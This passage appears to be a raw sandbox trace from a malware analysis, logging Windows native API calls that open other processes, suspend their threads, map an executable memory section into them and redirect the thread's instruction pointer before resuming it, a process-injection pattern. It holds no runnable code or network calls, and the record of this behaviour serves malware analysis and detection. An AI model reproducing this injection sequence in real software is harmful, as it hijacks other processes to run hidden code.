ProcessHandle=0xb4, BaseAddress=0x4cd000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0167.366] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0167.370] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x50c) | out: ThreadHandle=0xdea64*=0x138) returned 0x0 [0167.370] NtSuspendThread (in: ThreadHandle=0x138, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0167.370] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xb4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2160000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0167.412] NtGetContextThread (in: ThreadHandle=0x138, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x4cd000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0167.475] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0167.475] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x1a3200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x1a4000) returned 0x0 [0167.540] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xb4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x1a3200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2b30000, SectionOffset=0x0, ViewSize=0xde6e8*=0x1a4000) returned 0x0 [0167.602] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0167.627] NtClose (Handle=0x140) returned 0x0 [0167.627] NtSetContextThread (ThreadHandle=0x138, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x4cd000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x2c40707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0167.634] NtResumeThread (in: ThreadHandle=0x138, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0167.634] NtClose (Handle=0xb4) returned 0x0 [0167.634] NtClose (Handle=0x138) returned 0x0 [0167.635] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0xc68, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x138) returned 0x0 [0167.635] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0167.635] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0167.635] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x263000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0167.636] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0167.643] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0xc24) | out: ThreadHandle=0xdea64*=0xb4) returned 0x0 [0167.643] NtSuspendThread (in: ThreadHandle=0xb4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0167.643] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0x138, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2320000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0167.656] NtGetContextThread (in: ThreadHandle=0xb4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x263000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, 